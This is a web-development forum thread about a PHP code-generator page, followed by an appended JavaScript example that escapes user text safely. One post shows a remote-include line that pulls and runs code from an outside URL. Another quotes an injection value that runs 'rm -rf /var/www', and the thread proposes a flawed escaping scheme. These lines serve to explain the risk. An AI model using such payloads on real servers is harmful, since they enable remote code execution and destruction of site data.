
Thread: PHP Code Executer

  1. #11
    Join Date
    Nov 2006
    Location
    Northeast USA
    Posts
    408
    Thanks
    8
    Thanked 30 Times in 28 Posts


    Sorry for the late post (I was away from the computer for a while, long story).
    -----
    The echo that I mentioned was in the text box. So after the user clicked "Generate", a text box appeared containing:
    PHP Code:
    <textarea>
    <?\php
    //--------------------------------
    //CODE GENERATED BY: so-and-so
    //Visit us at http://A-URL-HERE.com
    //You MAY remove this notice
    //--------------------------------
    echo 'Some text that the user inputed above';
    \
    ?>
    </textarea>
    NOTE: the slash before <?\php and \?> will disappear when echoed out by the main script and prevent the textarea from saying "Some text that the user inputed above"
    I was originally going to do this in javascript, but in case the user did not have JS installed on their computer... It would be a lot cooler in php. I do not want to refresh the page, as soon as the user hits generate, boom, a text box appeared. I tried some stuff like a while($user_submited="yes") etc. but it never worked, It either sent it into an endless loop, or it didn't work, This could be a new thread, but it is still related to my problem.
    -Ben -- THE DYNAMIC DRIVERS
    My Links: My DD Profile||My Youtube Video Tutorials||DD Helping Coders||DD Coders In Training
    I told my client to press F5, the client pressed F, then 5, *facepalm*

  2. #12
    Join Date
    Mar 2006
    Location
    Illinois, USA
    Posts
    12,164
    Thanks
    265
    Thanked 690 Times in 678 Posts


    echo 'ha'.include('http://my.com/hackphp.txt')?'!';

    Anyway, Twey is right.

    As for what you're talking about now, the only way to make this work would be to write, from scratch, your own PHP parser. Wouldn't be impossible, but it would be complex, fast, as you started adding functions. Additionally, since you couldn't allow many things for security, it would be a waste, in some ways.


    PHP is a server side language. The only way to make it work without refreshing using PHP is to use javascript to load the PHP data and display it (ie, Ajax), or you could use an iframe, etc.
    Daniel - Freelance Web Design | <?php?> | <html>| español | Deutsch | italiano | português | català | un peu de français | some knowledge of several other languages: I can sometimes help translate here on DD | Linguistics Forum

  3. #13
    Join Date
    Nov 2006
    Location
    Northeast USA
    Posts
    408
    Thanks
    8
    Thanked 30 Times in 28 Posts


    You are forgetting this post:
    Quote Originally Posted by fileserverdirect
    Well then I will just eregi for it and the echo will be enclosed in single quotes so no code can be executed and if they try to type a " ' . shell_exec('rm -rf /var/www') . ' " I will check for a single quote and place a "\" before it, and if they try to double slash, a slash will be taken off. If there are any more suggestions, please post.
    Now my reply to a quote:
    PHP is a server side language. The only way to make it work without refreshing using PHP is to use javascript to load the PHP data and display it (ie, Ajax), or you could use an iframe, etc.
    I like the IFRAME idea but then I would have to give up my HTML 4.1 STRICT status, unless I get tricky and use javascript to display it but that would be dishonest. Ah well, I will stick to javascript generating the code, and the people who don't have javascript, ah well, they will just have to deal with it
    P.S. how do you highlight the code like you did above?
    Last edited by fileserverdirect; 09-13-2007 at 07:02 PM. Reason: typo

  4. #14
    Join Date
    Mar 2006
    Location
    Illinois, USA
    Posts
    12,164
    Thanks
    265
    Thanked 690 Times in 678 Posts


    I was just noting that there's a very simple one line way to hack that, even if you only allowed an echo statement. Using eregi replace would stop it, yes.


    the people who don't have javascript, ah well, they will just have to deal with it
    Same if you were to use Ajax or a javascript generated iframe. And, anyone with iframes probably has javascript too (though it could be disabled).

  5. #15
    Join Date
    Nov 2006
    Location
    Northeast USA
    Posts
    408
    Thanks
    8
    Thanked 30 Times in 28 Posts


    So what I was saying was right?
    Also the Hello World script creator was just a simple example. I can get into more complex stuff, from if statements, to custom functions, to anything else php. Well I am going to go with the javascript version, mainly because it does not use frames or php, all client side, I guess is the safest.

  6. #16
    Join Date
    Mar 2006
    Location
    Illinois, USA
    Posts
    12,164
    Thanks
    265
    Thanked 690 Times in 678 Posts


    PHP in this case would have no advantage either, as you will be rewriting a limited parser from scratch.
    Daniel - Freelance Web Design | <?php?> | <html>| español | Deutsch | italiano | português | català | un peu de français | some knowledge of several other languages: I can sometimes help translate here on DD | Linguistics Forum
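
Added example, not part of any post in this thread: a client-side generator of the kind the thread settles on, showing how to encode user text as a PHP single-quoted string literal and why the "add a backslash before the quote, take a slash off a double slash" scheme quoted in post #13 does not keep the text inside the quotes. The function names and sample inputs are assumptions made for this illustration.

```javascript
// Added example; function names are illustrative, sample inputs are constructed.

// Encode untrusted text as a PHP single-quoted string literal. Inside such a
// literal only \\ and \' are escapes, so escape backslashes first, then quotes.
function phpSingleQuoted(text) {
  return "'" + String(text).replace(/\\/g, "\\\\").replace(/'/g, "\\'") + "'";
}

// The scheme from the quoted post, for comparison: strip one slash from a
// doubled slash, then put a backslash before every single quote.
function naiveQuote(text) {
  return "'" + String(text).replace(/\\\\/g, "\\").replace(/'/g, "\\'") + "'";
}

// Scan a literal the way PHP reads single-quoted strings and report whether
// the first unescaped quote after the opener is the literal's last character.
function closesOnlyAtEnd(literal) {
  if (literal[0] !== "'") return false;
  let i = 1;
  while (i < literal.length) {
    const c = literal[i], next = literal[i + 1];
    if (c === "\\" && (next === "\\" || next === "'")) { i += 2; continue; }
    if (c === "'") return i === literal.length - 1;
    i += 1;
  }
  return false; // ran off the end: unterminated string
}

// Build the snippet shown to the user. Assign the result to textarea.value
// (not innerHTML) so the browser never parses it as markup.
function buildSnippet(text) {
  return "<?php\necho " + phpSingleQuoted(text) + ";\n?>";
}

// Constructed inputs: plain text, a pre-escaped quote, a doubled slash.
for (const input of ["Hello World", "it\\'s", "\\\\'"]) {
  console.log(JSON.stringify(input),
    "naive ok:", closesOnlyAtEnd(naiveQuote(input)),
    "encoded ok:", closesOnlyAtEnd(phpSingleQuoted(input)));
}
```

The generated text is only ever displayed for the visitor to copy; nothing here executes it, which is what keeps the all-client-side version free of the server-side risk discussed above.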
